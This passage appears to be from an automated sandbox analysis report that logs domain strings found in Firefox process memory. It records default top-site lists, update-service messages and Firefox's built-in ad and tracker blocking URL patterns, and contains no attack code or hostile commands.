Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlRestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUPDATE moz_bookmarks SET position = position + 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://ssl.google-analytics.com/ga.jsFileUtils_closeSafeFileOutputStream*://www.google-analytics.com/analytics.js*FileUtils_closeAtomicFileOutputStream*://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js**://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/facebook.svg*://www.google-analytics.com/plugins/ua/ec.js*://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/play.svgresource://gre/modules/addons/XPIProvider.jsm*://cdn.branch.io/branch-latest.min.js**://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat_video.js*://*.imgur.io/js/vendor.*.bundle.jspictureinpicture%40mozilla.org:1.0.0@mozilla.org/addons/addon-manager-startup;1*://www.rva311.com/static/js/main.*.chunk.js*://libs.coremetrics.com/eluminate.jswebcompat-reporter%40mozilla.org:1.5.1*://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://s0.2mdn.net/instream/html5/ima3.jsresource://gre/modules/FileUtils.sys.mjs*://pub.doubleverify.com/signals/pub.js**://web-assets.toggl.com/app/assets/scripts/*.js*://*.imgur.com/js/vendor.*.bundle.jswebcompat-reporter@mozilla.org.xpinsIURLDecorationAnnotationsService equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A49F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/jload?**://*.adsafeprotected.com/services/pub*color-mix(in srgb, currentColor 9%, transparent)*://*.adsafeprotected.com/*/unit/*resource://gre/modules/UpdateLog.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2910935393.00000259395ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2923113526.000002593AB2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2915888122.000002593A2F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2918105959.000002593A54F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2918105959.000002593A58B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-prompthttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-prompthttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-prompthttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=filedevtools-commandkey-profiler-capture@mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_words^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools/client/framework/devtoolsUnable to start devtools server on Failed to listen. Callback argument missing.DevToolsStartup.jsm:handleDebuggerFlag{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:browser and that URL. Falling back to and deploy previews URLs are allowed.resource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: Got invalid request to save JSON dataNo callback set for this channel.resource://devtools/shared/security/socket.jsdevtools-commandkey-profiler-start-stopdevtools-commandkey-javascript-tracing-toggledevtools.debugger.remote-websocketdevtools.debugger.features.javascript-tracingreleaseDistinctSystemPrincipalLoaderhttp://www.inbox.lv/rfc2368/?value=%s@mozilla.org/uriloader/dbus-handler-app;1get FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionresource://gre/modules/DeferredTask.sys.mjs^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs^([a-z+.-]+:\/{0,3})*([^\/@]+@).+Can't invoke URIFixup in the content processextractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjshttp://poczta.interia.pl/mh/?mailto=%s^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$){33d75835-722f-42c0-89cc-44f328e56a86}https://e.mail.ru/cgi-bin/sentmsg?mailto=%sisDownloadsImprovementsAlreadyMigratedget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPhandlerSvc fillHandlerInfo: don't know this typeget FIXUP_FLAGS_MAKE_ALTERNATE_URIhttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/local-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}browser.fixup.domainsuffixwhitelist.Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<extension/bing@search.mozilla.org/extendedData equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3055217724.000001EF29EEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2917321112.000002593A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2917321112.000002593A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000015.00000002.2884763162.0000025934458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", 